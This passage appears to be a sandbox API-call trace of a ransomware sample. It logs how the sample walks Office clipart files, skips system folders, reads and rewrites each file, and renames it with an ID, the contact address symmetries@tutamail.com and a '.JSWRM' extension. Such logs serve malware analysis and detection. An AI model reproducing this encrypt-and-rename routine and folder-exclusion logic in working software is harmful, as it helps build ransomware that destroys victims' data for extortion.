(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.736] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5375) returned 1 [0073.736] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14f0) returned 0x24c1d0 [0073.736] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x14f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x14f0, lpOverlapped=0x0) returned 1 [0073.738] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.738] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x14f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x14f0, lpOverlapped=0x0) returned 1 [0073.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.738] CloseHandle (hObject=0x460) returned 1 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0073.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0073.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0073.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0073.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0073.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.739] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00170_.GIF", cAlternateFileName="")) returned 1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2=".") returned 1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="..") returned 1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="...") returned 1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="windows") returned -1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="recovery") returned -1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="perflogs") returned -1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="documents and settings") returned -1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="system volume information") returned -1 [0073.739] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="msocache") returned -1 [0073.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00170_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00170_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00170_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00170_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00170_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00170_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.740] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9248) returned 1 [0073.740] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2420) returned 0x24c1d0 [0073.740] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2420, lpOverlapped=0x0) returned 1 [0073.742] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.742] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2420, lpOverlapped=0x0) returned 1 [0073.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.742] CloseHandle (hObject=0x460) returned 1 [0073.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0073.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0073.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0073.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.743] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.743] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1398, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00171_.GIF", cAlternateFileName="")) returned 1 [0073.743] lstrcmpiW (lpString1="AG00171_.GIF", lpString2=".") returned 1 [0073.743] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="..") returned 1 [0073.743] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="...") returned 1 [0073.743] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="windows") returned -1 [0073.743] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="recovery") returned -1 [0073.744] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="perflogs") returned -1 [0073.744] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="documents and settings") returned -1 [0073.744] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.744] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="system volume information") returned -1 [0073.744] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="msocache") returned -1 [0073.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00171_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00171_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00171_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0073.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00171_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00171_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00171_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.744] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5016) returned 1 [0073.744] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1390) returned 0x24c1d0 [0073.745] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1390, lpOverlapped=0x0) returned 1 [0073.787] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.787] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1390, lpOverlapped=0x0) returned 1 [0073.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.787] CloseHandle (hObject=0x460) returned 1 [0073.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0073.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0073.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0073.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.788] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.788] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1126, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00172_.GIF", cAlternateFileName="")) returned 1 [0073.788] lstrcmpiW (lpString1="AG00172_.GIF", lpString2=".") returned 1 [0073.788] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="..") returned 1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="...") returned 1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="windows") returned -1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="recovery") returned -1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="perflogs") returned -1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="documents and settings") returned -1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="system volume information") returned -1 [0073.789] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="msocache") returned -1 [0073.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00172_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00172_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00172_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0073.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00172_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00172_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00172_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0073.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.789] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4390) returned 1 [0073.789] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1120) returned 0x24c1d0 [0073.789] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1120, lpOverlapped=0x0) returned 1 [0073.791] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.791] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1120, lpOverlapped=0x0) returned 1 [0073.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.791] CloseHandle (hObject=0x460) returned 1 [0073.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 